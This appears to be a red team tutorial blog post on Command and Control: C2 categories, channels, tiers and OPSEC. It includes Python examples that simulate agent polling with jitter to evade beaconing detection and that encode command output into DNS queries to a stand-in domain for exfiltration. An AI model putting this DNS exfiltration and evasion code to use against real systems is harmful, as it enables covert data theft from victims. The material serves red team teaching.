It's all about Command and Control
Learn all about Command and Control (C2), its categories, channels, tiers and its role in red team operations.
A Command and Control (C2) tool is the crown jewel of a red team’s arsenal. It enables operators to establish a centralized communication channel with compromised hosts (Command), with the help of a small piece of software running on each host, and then use that channel to assign tasks or perform actions on them, such as downloading and installing additional tools (Control). This is similar to how military operations are often portrayed in movies: there is a war room where personnel monitor and govern the operation (Command), and there are soldiers on the ground executing their orders (Control).
The small piece of software that enables this communication and command execution on a compromised host is commonly referred to as an agent. A C2 tool may also use its own nomenclature for these agents. For example, Cobalt Strike calls them Beacons whereas Covenant calls them Grunts. You may also see them referred to as implants.
C2 can be categorized as:
Synchronous - The communication channel between the C2 and the agent is kept open at all times. It enables real-time interaction with the agent. This is the least preferred way of communicating with agents because a long-lived connection stands out in network telemetry and does not provide adequate OPSEC.
Asynchronous - The communication channel between the C2 and the agent is established at periodic intervals. The agent polls the C2 (known as polling) at a defined interval (known as the polling interval) to check whether there are any new tasks and to report the output of the previous ones. The polling interval is controlled by the red team operator. It can be reduced to the point that communication between the C2 and the agent appears to be real-time. Selecting the right polling interval is tricky but necessary for OPSEC: too much communication with the C2 (i.e. a low polling interval) can lead to detection of the agent, while too little (i.e. a high polling interval) slows the engagement down. Most C2 tools also let the operator add jitter, a random variation around the polling interval, so that the callbacks do not form a perfectly periodic pattern that is easy to spot in proxy or NetFlow logs.
On-Demand - The communication channel between the C2 and the agent is established only as and when required. For example, the operator may open a web shell on the compromised host, or trigger a reverse shell connection from it, only when a task needs to be performed.
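To make the asynchronous model concrete, here is an added example (written for this page, not code from any C2 tool) that simulates an agent polling an in-memory stand-in for a C2 tasking queue. The C2Server class, the task strings and the "ran:" executor are constructed placeholders; a real C2 would expose the same check-in over a listener. The example also computes how regular the resulting callback gaps are, which shows why a jitter of 0 is bad OPSEC even with a long polling interval.

```python
import random
import statistics
from collections import deque


class C2Server:
    """Constructed stand-in for the C2 side: a task queue and a result store."""

    def __init__(self):
        self.tasks = deque()   # tasks waiting for the agent
        self.results = []      # output the agent has reported back

    def queue_task(self, task):
        self.tasks.append(task)

    def checkin(self, results):
        """One poll: accept results of earlier tasks, hand out everything pending."""
        self.results.extend(results)
        pending = list(self.tasks)
        self.tasks.clear()
        return pending


def next_sleep(interval, jitter, rng=random):
    """Seconds until the next poll: interval varied by +/- jitter (0.3 means 30%)."""
    if not 0 <= jitter < 1:
        raise ValueError("jitter must be in [0, 1)")
    return interval * (1 + rng.uniform(-jitter, jitter))


def run_agent(server, interval, jitter, cycles, rng=random, executor=None):
    """Simulate `cycles` asynchronous check-ins against `server`.

    Returns (tasks executed, list of sleep durations). Output of a task is only
    reported on the *next* poll, exactly as an asynchronous agent would do it.
    """
    executor = executor or (lambda task: f"ran:{task}")   # placeholder "execution"
    results, executed, sleeps = [], [], []
    for _ in range(cycles):
        tasks = server.checkin(results)            # report previous output, fetch work
        results = [executor(t) for t in tasks]     # run tasks while "offline"
        executed.extend(tasks)
        sleeps.append(next_sleep(interval, jitter, rng))   # time.sleep() in a real agent
    server.checkin(results)                        # deliver the last batch of output
    return executed, sleeps


def regularity(sleeps):
    """Coefficient of variation of the callback gaps. 0.0 means perfectly periodic."""
    return statistics.pstdev(sleeps) / statistics.mean(sleeps)


def run_demo(interval=60, jitter=0.3, cycles=5, seed=1):
    """Queue two constructed tasks, run the agent, return what an operator would see."""
    rng = random.Random(seed)   # seeded so the demo is reproducible
    server = C2Server()
    server.queue_task("whoami")
    server.queue_task("hostname")
    executed, sleeps = run_agent(server, interval, jitter, cycles, rng)
    return {
        "executed": executed,
        "results": server.results,
        "sleeps": sleeps,
        "regularity": regularity(sleeps),
    }


if __name__ == "__main__":
    for jitter in (0.0, 0.3):
        demo = run_demo(jitter=jitter)
        print(f"jitter={jitter:.1f} gaps={[round(s) for s in demo['sleeps']]} "
              f"regularity={demo['regularity']:.2f} results={demo['results']}")
```

With jitter 0.0 every gap is exactly the polling interval and the regularity score is 0, the signature that beaconing detections look for; with jitter 0.3 the gaps spread across 42 to 78 seconds for a 60 second interval, which breaks the periodicity at the cost of a less predictable response time.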
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
A C2 is capable of communicating with the agent over multiple channels (or protocols), such as:
HTTP / HTTPS - The communication between the C2 and the agent happens via web requests. The C2 creates a web server as a listener, which issues tasks to the agent and accepts the output from them.
DNS - The communication between the C2 and the agent happens via DNS resolution requests. The red team operator creates an NS record that delegates a subdomain to a name server whose IP address is controlled by the C2. The C2 runs a listener on that IP address to receive and answer the DNS queries sent by the agent: tasking comes back in the responses, and output goes out encoded in the queried names. Watch this video for a technical deep dive.
TCP - The communication between the C2 and the agent happens over a raw TCP socket with the tool's own framing, instead of a standard layer 7 protocol.
ICMP - The communication between the C2 and the agent happens via ICMP echo requests and replies. The data is smuggled within the data section of the ICMP message. The volume of data that fits in echo request payloads is too low to make this channel practical for most purposes, and many networks rate-limit or block ICMP egress. Also, ICMP provides no encryption of the data section, so the agent has to encrypt the payload itself.
SSH - The communication between the C2 and the agent happens over an SSH connection. This connection is usually established using the SSH client already available on the compromised host.
SMB - The communication between the C2 and the agent happens via named pipes over SMB. This channel is commonly used to reach internal hosts that have no direct egress, by chaining them (daisy chaining) through a host that already has an external channel.
Others - Various C2 tools may offer support for additional channels such as via messaging apps, social media, emails etc. Certain C2 tools also offer the capability to integrate with other C2 tools. Check this list from MITRE to know about all channels that can be used for C2 communication.
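The DNS channel above is the least obvious one, so here is an added example (written for this page, not taken from any C2 tool) of the mechanics on both sides: the agent encodes output into query names under a delegated zone, and the C2 name server reassembles it. The domain c2.example.com, the session label and the "end-marker" terminator are assumptions for the example. The decoder deliberately tolerates out-of-order delivery and duplicate queries, because resolvers retry and reorder, and it reports which sequence numbers are still missing instead of silently returning truncated data.

```python
import base64

C2_DOMAIN = "c2.example.com"   # assumption: a zone delegated via an NS record to the C2 server
MAX_LABEL = 63                 # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                 # longest name in printable form
END_LABEL = "end-marker"       # '-' never appears in base32 output, so it cannot collide with data


def encode_queries(session, data, domain=C2_DOMAIN):
    """Agent side: split `data` into names of the form
    <seq>.<b32 chunk>[.<b32 chunk>...].<session>.<domain>, then a terminator."""
    # DNS is case-insensitive, so use lower-case base32 and drop the padding.
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    # Every data label costs len(label) + 1 (its dot); fit as many full labels as the name allows.
    fixed = len(f"00000.{session}.{domain}")
    labels_per_query = (MAX_NAME - fixed) // (MAX_LABEL + 1)
    per_query = labels_per_query * MAX_LABEL
    queries = []
    for seq, start in enumerate(range(0, len(b32), per_query)):
        piece = b32[start:start + per_query]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        queries.append(f"{seq:05d}.{'.'.join(labels)}.{session}.{domain}")
    # Terminator carries the total number of data queries so the server can detect gaps.
    queries.append(f"{len(queries):05d}.{END_LABEL}.{session}.{domain}")
    return queries


def decode_queries(queries, domain=C2_DOMAIN):
    """Server side: reassemble sessions from observed query names.

    Returns (complete, incomplete): complete maps session -> bytes, incomplete maps
    session -> sorted list of missing sequence numbers. Sessions whose terminator has
    not arrived yet appear in neither.
    """
    suffix = "." + domain
    chunks, expected = {}, {}
    for name in queries:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                   # not ours (e.g. unrelated lookups)
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or not labels[0].isdigit():
            continue                                   # malformed, ignore
        seq, session, body = int(labels[0]), labels[-1], labels[1:-1]
        if body == [END_LABEL]:
            expected[session] = seq
        else:
            chunks.setdefault(session, {})[seq] = "".join(body)   # duplicates overwrite with same value
    complete, incomplete = {}, {}
    for session, total in expected.items():
        parts = chunks.get(session, {})
        missing = [i for i in range(total) if i not in parts]
        if missing:
            incomplete[session] = missing
            continue
        b32 = "".join(parts[i] for i in range(total)).upper()
        complete[session] = base64.b32decode(b32 + "=" * (-len(b32) % 8))
    return complete, incomplete


if __name__ == "__main__":
    sample = b"nt authority\\system\n" * 30           # constructed command output
    names = encode_queries("a1", sample)
    print(f"{len(names)} queries, longest {max(map(len, names))} chars")
    done, gaps = decode_queries(names[::-1] + names[:2])   # reordered plus retried
    print(done["a1"] == sample, gaps)
```

Two practical points fall out of the code: a single kilobyte of output already needs several queries, which is why DNS is a low-bandwidth channel best kept for tasking and small results, and the per-session sequence numbers are what let the server cope with the resolver behaviour it does not control.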
During a red team engagement, C2 channels can be established as per following tiers:
Interactive - C2 channels in this tier are used most frequently. They are primarily used for issuing commands, enumeration, scanning and data exfiltration. The callback time is usually within minutes. For example, the agent beaconing from a compromised workstation.
Short-Haul - C2 channels in this tier are used to re-establish interactive mechanisms if they are lost. The callback time is within 12-24 hours. For example, a cron job that downloads the C2 agent and executes it every 12 hours.
Long-Haul - C2 channels in this tier are used to re-establish short-haul mechanisms. The callback time is 24 hours or more. This is the slowest mechanism of the three and should not be used for interactive purposes. For example, a start-up script that recreates the cron job mentioned above.
Red Team Notes
- A Command and Control (C2) tool is a key red team asset, enabling a centralized communication channel with compromised hosts (Command) via an agent, which executes the assigned tasks (Control). Different C2 tools may use their own names for agents, like "Beacon" in Cobalt Strike or "Grunt" in Covenant.
- C2 Categories - Synchronous, Asynchronous and On-demand.
- C2 Channels - HTTP/HTTPS, DNS, TCP, ICMP, SSH, SMB and others.
- C2 Tiers - Interactive, Short-Haul and Long-Haul.
- OPSEC considerations must be taken into account to establish reliable C2 channels and avoid detection.
- It is usually difficult to reach target hosts directly from the internet, but those hosts can usually establish an outbound connection. Keep this in mind when selecting the channel.
C2 is a key capability that a red team must have. It enables red team operators to keep track of compromised hosts in a centralized manner, interact with them and leverage them for further enumeration, command and tool execution, lateral movement, establishing persistence and data exfiltration. A good C2 tool gives operators enough flexibility to customize it to their requirements, extend it with custom plugins and collaborate with other operators through session sharing.
Command and Control (C2) is covered in detail in the book, Red Team Development and Operations by Joe Vest and James Tubberville.
Also, check out the C2 Matrix project to learn about various C2 tools available in the market. It includes information about both, commercial and open-source C2 tools. The list is updated regularly as and when new C2 tools are published.